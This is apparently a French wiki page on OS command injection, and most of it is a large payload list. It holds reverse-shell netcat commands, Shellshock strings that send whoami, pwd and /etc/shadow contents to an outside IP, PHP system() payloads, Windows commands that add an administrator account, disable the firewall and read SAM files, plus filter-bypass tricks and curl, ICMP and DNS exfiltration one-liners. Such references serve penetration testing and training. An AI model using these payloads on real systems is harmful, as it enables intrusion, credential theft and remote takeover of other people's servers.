XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
exec('ls')
exec('pwd')
exec('pwd');
exec('sleep 5')
exec('sleep 5');
exec('whoami')
exec('whoami');
;{$_GET["cmd"]}
`id`
|id
| id
;id
;id|
;id;
& id
&&id
;id\n
ifconfig
| ifconfig
; ifconfig
& ifconfig
&& ifconfig
/index.html|id|
ipconfig
| ipconfig /all
; ipconfig /all
& ipconfig /all
&& ipconfig /all
ipconfig /all
ls
$(`ls`)
| ls -l /
; ls -l /
& ls -l /
&& ls -l /
ls -l /
| ls -laR /etc
; ls -laR /etc
& ls -laR /etc
&& ls -laR /etc
| ls -laR /var/www
; ls -laR /var/www
& ls -laR /var/www
&& ls -laR /var/www
| ls -l /etc/
; ls -l /etc/
& ls -l /etc/
&& ls -l /etc/
ls -l /etc/
ls -lh /etc/
| ls -l /home/*
; ls -l /home/*
& ls -l /home/*
&& ls -l /home/*
ls -l /home/*
*; ls -lhtR /var/www/
| ls -l /tmp
; ls -l /tmp
& ls -l /tmp
&& ls -l /tmp
ls -l /tmp
| ls -l /var/www/*
; ls -l /var/www/*
& ls -l /var/www/*
&& ls -l /var/www/*
ls -l /var/www/*
\n
\n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\`
\n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\`
\n/bin/ls -al\n
| nc -lvvp 4444 -e /bin/sh|
; nc -lvvp 4444 -e /bin/sh;
& nc -lvvp 4444 -e /bin/sh&
&& nc -lvvp 4444 -e /bin/sh &
nc -lvvp 4444 -e /bin/sh
nc -lvvp 4445 -e /bin/sh &
nc -lvvp 4446 -e /bin/sh|
nc -lvvp 4447 -e /bin/sh;
nc -lvvp 4448 -e /bin/sh&
\necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n
\necho INJECTX\nexit\n\033[2Asleep 5\n
\necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n
| net localgroup Administrators hacker /ADD
; net localgroup Administrators hacker /ADD
& net localgroup Administrators hacker /ADD
&& net localgroup Administrators hacker /ADD
net localgroup Administrators hacker /ADD
| netsh firewall set opmode disable
; netsh firewall set opmode disable
& netsh firewall set opmode disable
&& netsh firewall set opmode disable
netsh firewall set opmode disable
netstat
;netstat -a;
| netstat -an
; netstat -an
& netstat -an
&& netstat -an
netstat -an
| net user hacker Password1 /ADD
; net user hacker Password1 /ADD
& net user hacker Password1 /ADD
&& net user hacker Password1 /ADD
net user hacker Password1 /ADD
| net view
; net view
& net view
&& net view
net view
\nid|
\nid;
\nid\n
\n/usr/bin/id\n
perl -e 'print "X"x1024'
|| perl -e 'print "X"x16096'
| perl -e 'print "X"x16096'
; perl -e 'print "X"x16096'
& perl -e 'print "X"x16096'
&& perl -e 'print "X"x16096'
perl -e 'print "X"x16384'
; perl -e 'print "X"x2048'
& perl -e 'print "X"x2048'
&& perl -e 'print "X"x2048'
perl -e 'print "X"x2048'
|| perl -e 'print "X"x4096'
| perl -e 'print "X"x4096'
; perl -e 'print "X"x4096'
& perl -e 'print "X"x4096'
&& perl -e 'print "X"x4096'
perl -e 'print "X"x4096'
|| perl -e 'print "X"x8096'
| perl -e 'print "X"x8096'
; perl -e 'print "X"x8096'
&& perl -e 'print "X"x8096'
perl -e 'print "X"x8192'
perl -e 'print "X"x81920'
|| phpinfo()
| phpinfo()
{${phpinfo()}}
;phpinfo()
;phpinfo();//
';phpinfo();//
{${phpinfo()}}
& phpinfo()
&& phpinfo()
phpinfo()
phpinfo();
<?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>
<?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?req=df2fkjj");?>
<?php system("echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");?>
<?php system("sleep 10");?>
<?php system("sleep 5");?>
<?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>
<?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?req=jdfj2jc");?>
:phpversion();
`ping 127.0.0.1`
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
;${@print(md5(RCEVulnerable))};
${@print("RCEVulnerable")}
${@print(system($_SERVER['HTTP_USER_AGENT']))}
pwd
| pwd
; pwd
& pwd
&& pwd
\r
| reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
&& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
\r\n
route
| sleep 1
; sleep 1
& sleep 1
&& sleep 1
sleep 1
|| sleep 10
| sleep 10
; sleep 10
{${sleep(10)}}
& sleep 10
&& sleep 10
sleep 10
|| sleep 15
| sleep 15
; sleep 15
& sleep 15
&& sleep 15
{${sleep(20)}}
{${sleep(20)}}
{${sleep(3)}}
{${sleep(3)}}
| sleep 5
; sleep 5
& sleep 5
&& sleep 5
sleep 5
{${sleep(hexdec(dechex(20)))}}
{${sleep(hexdec(dechex(20)))}}
sysinfo
| sysinfo
; sysinfo
& sysinfo
&& sysinfo
system('cat C:\boot.ini');
system('cat config.php');
|| system('curl https://crowdshield.com/.testing/rce_vuln.txt');
| system('curl https://crowdshield.com/.testing/rce_vuln.txt');
; system('curl https://crowdshield.com/.testing/rce_vuln.txt');
& system('curl https://crowdshield.com/.testing/rce_vuln.txt');
&& system('curl https://crowdshield.com/.testing/rce_vuln.txt');
system('curl https://crowdshield.com/.testing/rce_vuln.txt')
system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf')
system('curl https://xerosecurity.com/.testing/rce_vuln.txt');
system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
systeminfo
| systeminfo
; systeminfo
& systeminfo
&& systeminfo
system('ls')
system('pwd')
system('pwd');
|| system('sleep 5');
| system('sleep 5');
; system('sleep 5');
& system('sleep 5');
&& system('sleep 5');
system('sleep 5')
system('sleep 5');
system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23')
system('wget https://xerosecurity.com/.testing/rce_vuln.txt');
system('whoami')
system('whoami');
test*; ls -lhtR /var/www/
test* || perl -e 'print "X"x16096'
test* | perl -e 'print "X"x16096'
test* & perl -e 'print "X"x16096'
test* && perl -e 'print "X"x16096'
test*; perl -e 'print "X"x16096'
$(`type C:\boot.ini`)
&&type C:\\boot.ini
| type C:\Windows\repair\SAM
; type C:\Windows\repair\SAM
& type C:\Windows\repair\SAM
&& type C:\Windows\repair\SAM
type C:\Windows\repair\SAM
| type C:\Windows\repair\SYSTEM
; type C:\Windows\repair\SYSTEM
& type C:\Windows\repair\SYSTEM
&& type C:\Windows\repair\SYSTEM
type C:\Windows\repair\SYSTEM
| type C:\WINNT\repair\SAM
; type C:\WINNT\repair\SAM
& type C:\WINNT\repair\SAM
&& type C:\WINNT\repair\SAM
type C:\WINNT\repair\SAM
type C:\WINNT\repair\SYSTEM
| type %SYSTEMROOT%\repair\SAM
; type %SYSTEMROOT%\repair\SAM
& type %SYSTEMROOT%\repair\SAM
&& type %SYSTEMROOT%\repair\SAM
type %SYSTEMROOT%\repair\SAM
| type %SYSTEMROOT%\repair\SYSTEM
; type %SYSTEMROOT%\repair\SYSTEM
& type %SYSTEMROOT%\repair\SYSTEM
&& type %SYSTEMROOT%\repair\SYSTEM
type %SYSTEMROOT%\repair\SYSTEM
uname
;uname;
| uname -a
; uname -a
& uname -a
&& uname -a
uname -a
|/usr/bin/id
;|/usr/bin/id|
;/usr/bin/id|
$;/usr/bin/id
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");'
() { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11
| wget http://crowdshield.com/.testing/rce.txt
& wget http://crowdshield.com/.testing/rce.txt
; wget https://crowdshield.com/.testing/rce_vuln.txt
$(`wget https://crowdshield.com/.testing/rce_vuln.txt`)
&& wget https://crowdshield.com/.testing/rce_vuln.txt
wget https://crowdshield.com/.testing/rce_vuln.txt
$(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
which curl
which gcc
which nc
which netcat
which perl
which python
which wget
whoami
| whoami
; whoami
' whoami
' || whoami
' & whoami
' && whoami
'; whoami
" whoami
" || whoami
" | whoami
" & whoami
" && whoami
"; whoami
$(`whoami`)
& whoami
&& whoami
{{ get_user_file("C:\boot.ini") }}
{{ get_user_file("/etc/hosts") }}
{{4+4}}
{{4+8}}
{{person.secret}}
{{person.name}}
{1} + {1}
{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}
{{[] .__ Class __.__ base __.__ subclasses __ ()}}
</nowiki>

== Références ==
*https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
*https://github.com/payloadbox/command-injection-payload-list
*https://book.hacktricks.xyz/pentesting-web/command-injection

Web:Injection de Commandes

2023-12-02T18:56:30Z

OldNeib : /* Unix */

Lors de l'exécution d'une commande en ligne prenant en paramètre une entrée utilisateur, il est parfois possible de s'évader du champ d'action prévu par l'ajout de certains caractères:
== Les Métacharacteres ==
; | Le point-virgule est le métacaractère le plus couramment utilisé pour tester une faille d'injection. Le shell exécute toutes les commandes séparées par le point-virgule.
& | Il sépare plusieurs commandes sur une ligne de commande. Il exécute la première commande puis la seconde.
&& | Si la commande précédente à && est réussie, alors seulement elle exécute la commande suivante.
| | Redirige les sorties standard de la première commande vers l'entrée standard de la deuxième commande.
|| | Le || n'exécute la commande suivante que si la commande précédente échoue.
`` | Le métacaractère "unquote" est utilisé pour forcer le shell à interpréter et à exécuter la commande à l'interieur. Ex: '$ Variable="OS version `uname -a`" && echo $variable'

Exemple simple de script PHP utilisant ping.
<?php
if(isset($_POST["ip"]) && !empty($_POST["ip"])){
$response = shell_exec("timeout 5 bash -c 'ping -c 3 ".$_POST["ip"]."'");
echo $response;
}
?>

Au lieu de fournir une ip, il est possible d'injecter une commade par l'utilisation des métacharacteres.
*127.0.0.1;ls -la
*;ls -la
*;ls%20-la
*;ls%09-la
*(...)

== Afficher le contenu d'un fichier PHP ==
L'injection de la commande ;php -s file.php va permettre d'afficher le contenu du fichier php plutôt que ;cat file.php qui risque lui d'être exécuté.

== Contournement de filtres ==
Si certain filtres sont en place, par exemple en supprimant les caractères d'évasion, on peut tenter un retour à la ligne via l'ajout de %0a.

La commande suivant le %0a sera alors exécutée.

=== Exemple de filtre maison ===
// Set blacklist
$substitutions = array(
'&' => '',
';' => '',
'| ' => '',
'-' => '',
'$' => '',
'(' => '',
')' => '',
'`' => '',
'||' => '',
);

On remarque le '| ', ce qui veut dire que le '|' n'est pas filtré s'il n'est pas suivi d'un espace. En y allant à taton on peut retrouver certaines règles.
*127.0;.0.1
*12&7.0.0.1
*(...)

Il est donc primordial de jouer avec les espaces!
*127.0.0.1|cat password.txt
*127.0.0.1 |cat password.txt
*127.0.0.1| cat password.txt
*(...)

Une commande possible serait donc:

127.0.0.1%0als -la

On peut se retrouver bloquer par l'encodage des caractères spéciaux via les formulaires web (127.0.0.1%250als -la), il semblerait que curl soit plus permissif, ou alors il faudrait modifier directement le header avant l'envoie de la requête.

=== Autre type de filtres ===
==== Double Encoding ====
Dans le cas oú l'on aurait quelque chose comme ça:

str_replace("%26", "")

On donc peut tenter un double encoding %%2626 deviendra alors %26.

==== Sans Espaces ====
Dans le cas oú les espaces serait supprimmés:

===== Le Bash Internal Field Separator: $IFS =====

;cat${IFS}/etc/passwd

===== SI IFS est blacklisté =====

;{cat,/etc/passwd}

===== Utilisation de TAB =====

;cat%09/etc/passwd

===== Line-Feed in the middle =====

;cat%0a/etc/passwd

===== Utilisation du '+' =====

;cat+/etc/passwd

===== Env Variable =====
;$var='x20';cat${var}/etc/passwd

===== Sans $ ni {} =====
;IFS=,;`cat<<</etc,/passwd`

==== Certains mots blacklistés ====
Si "cat" ou "passwd" ou "nimp" est blacklisté:

===== The Wildcard caracters =====

;/bin/cat /etc/passwd == ;/b*n/c /et*/pawd == ;/b?n/c?? /et?/pa??wd

===== Unitialized variable $u qui a une valeur nulle =====

;cat$u /etc$u/passwd

===== Null Variable =====

;cat /et``c/pas``swd
;cat /e$()tc/pa$()sswd
;cat /etc$(dlam)/pa$(erde)sswd

===== Troncation par quote, double quotes, ou backslash =====

;/bin/c"at" /e"tc"/pa"ss"wd
;/b'i'n/c'a't /e't'c/p'a's's'w'd'
;c\at /e\tc/pa\s\swd/

===== $@ =====
;c$@at /etc/passwd

==== Sans Slash ====
Si le slah est filtré on peut utilisé ${HOME:0;1} qui représente un slash:

;cat ${HOME:0;1}etc${HOME:0;1}passwd

==== ${SHELLOPTS} ====
De la même façon on peut utilisé ${SHELLOPTS} pour représenter un caractère spécifique:

${SHELLOPTS:3:1} représente un c.
${SHELLOPTS:2:1} représente un a.
(À creuser...)
;${SHELLOPTS:3:1}at /etc/p${SHELLOPTS:2:1}sswd

==== Reverse and Encode ====
;`echo "dwssap/cte/ tac | rev`
;$(echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d)

==== Hexadecimal encode ====

;echo -e "x2fx65x74x63x2fx70x61x73x73x77x64" # (/etc/passwd)

== Cheat Sheet ==
=== Top 25 des paramètres pouvant conduire à une injection ===
?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

=== Fonctions PHP vulnérables ===
system()
exec()
shell_exec()
open()
pcntl_exec()
ioctl_exec()
eio_syncfs()
proc_open()
popen()

Command Execution Function Filtered possible Bypass with encoding
system()
passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()
Reverse quotation marks are identical shell_exec()

=== DATA Exfiltration ===
Il est parfois possible de ne pas avoir de retour de la commande injectée, on peut alors passer par une requête POST et s'envoyer n'importe quel fichier. ([https://requestcatcher.com/])

==== cURL ====
$ curl -d "ip=127.0.0.1%0acurl -d"@Any_File" -X POST "https://requestbin.net/r/dyc3s5m8"" -X POST http://exemple.com/index.php
$ curl -d "@file" -X POST http://domain.com

==== cURL avec FTP ====
$ curl -T file ftp://ip -user nick:pass

==== Netcat ====
$ nc -l -p {port} < {file to extract}

==== ICMP ====
Si l'hôte que vous visez a été renforcé et que des outils tels que netcat, wget et CURL ont été supprimés, vous pouvez encore utiliser certaines techniques. Essayez de faire en sorte que l'hôte envoie un ping à votre boîte et voyez si le protocole ICMP passe à travers les pare-feux qui interviennent. Si c'est le cas, et que l'hôte sous-jacent tourne sous Linux, nous pouvons exfiltrer des données dans les requêtes ICMP en utilisant l'indicateur -p. L'option -p vous permet de spécifier jusqu'à 16 octets de "pad". C'est là que nous stockerons les données que nous voulons exfiltrer.

Nous devons d'abord convertir le fichier en hexadécimal, puis spécifier les données à insérer dans le paquet. Ceci peut être fait avec la ligne suivante :
cat password.txt | xxd -p -c 16 | while read exfile; do ping -p $exfile -c 1 xxx.xxx.xxx.xxx; done

Avec Wireshark, nous pouvons observer les paquets contenant nos données. Vous pouvez écrire un script qui récupère les paquets et réassemble le fichier sur l'hôte.

==== DNS ====
De la même manière que ping, DNS peut également être utilisé pour exfiltrer des données. Cette fois, nous allons utiliser chaque ligne de données comme nom d'hôte d'une requête DNS. En surveillant le trafic sur notre machine, nous pouvons réassembler le fichier. Dans ce cas, la commande suivante est soumise dans le cadre de notre requête au serveur vulnérable :
cat password.txt | while read exfile; do host $exfile.contextis.com xxx.xxx.xxx.xxx; done
for i in $(cat password.txt); do host $i.hkj.com; done

Comme pour le ping, vous pouvez écrire un script pour récupérer les paquets DNS entrants et réassembler le fichier.

==== Time based data exfiltration ====
Extraction caractère par caractère :
$ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
user 0m0.000s
sys 0m0.000s

$ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real 0m0.002s
user 0m0.000s
sys 0m0.000s

==== Reverse Shell ====
Avec Netcat:
nc -L -p port -e cmd.exe (Windows)
nc -l -p port -e /bin/bash (*nix)

===== Se connecter =====
====== Netcat ======
$ nc {ip} {port}
$ nc {ip} {port} > output

(Windows)
type {file to extract} | nc -L -p {port}

====== wget ======
wget --post-data exfile=`cat /path/to/file` http://domain.com
wget --post-file file http://domain.com

====== Telnet ======
telnet ip port < file

=== Command Injection/Execution Cheat Sheet ===
#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands

#Not execute but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command
===== Unix =====




/index.html|id|
;id;
;id
;netstat -a;
;system('cat%20/etc/passwd')
;id;
|id
|/usr/bin/id
|id|
|/usr/bin/id|
||/usr/bin/id|
|id;
||/usr/bin/id;
;id|
;|/usr/bin/id|
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
a);id
a;id
a);id;
a;id;
a);id|
a;id|
a)|id
a|id
a)|id;
a|id
|/bin/ls -al
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id
;system('cat%20/etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat%20/etc/passwd
%0A/usr/bin/id
%0Aid
%0A/usr/bin/id%0A
%0Aid%0A
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
%0a ping -i 30 127.0.0.1 %0a
`ping 127.0.0.1`
| id
& id
; id
%0a id %0a
`id`
$;/usr/bin/id
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5"
() { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6"
() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"
() { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7"
() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8"
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9"
() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4"
cat /etc/hosts
$(`cat /etc/passwd`)
cat /etc/passwd
%0Acat%20/etc/passwd
<nowiki>{{ get_user_file("/etc/passwd") }}</nowiki>



system('cat /etc/passwd');
<?php system("cat /etc/passwd");?>

===== Windows =====
`
||
|
;
'
'"
"
"'
&
&&
%0a
%0a%0d

%0Aid
%0a id %0a
%0Aid%0A
%0a ping -i 30 127.0.0.1 %0a
%0A/usr/bin/id
%0A/usr/bin/id%0A
%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1
%20{${phpinfo()}}
%20{${sleep(20)}}
%20{${sleep(3)}}
a|id|
a;id|
a;id;
a;id\n
() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12
| curl http://crowdshield.com/.testing/rce.txt
& curl http://crowdshield.com/.testing/rce.txt
; curl https://crowdshield.com/.testing/rce_vuln.txt
&& curl https://crowdshield.com/.testing/rce_vuln.txt
curl https://crowdshield.com/.testing/rce_vuln.txt
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
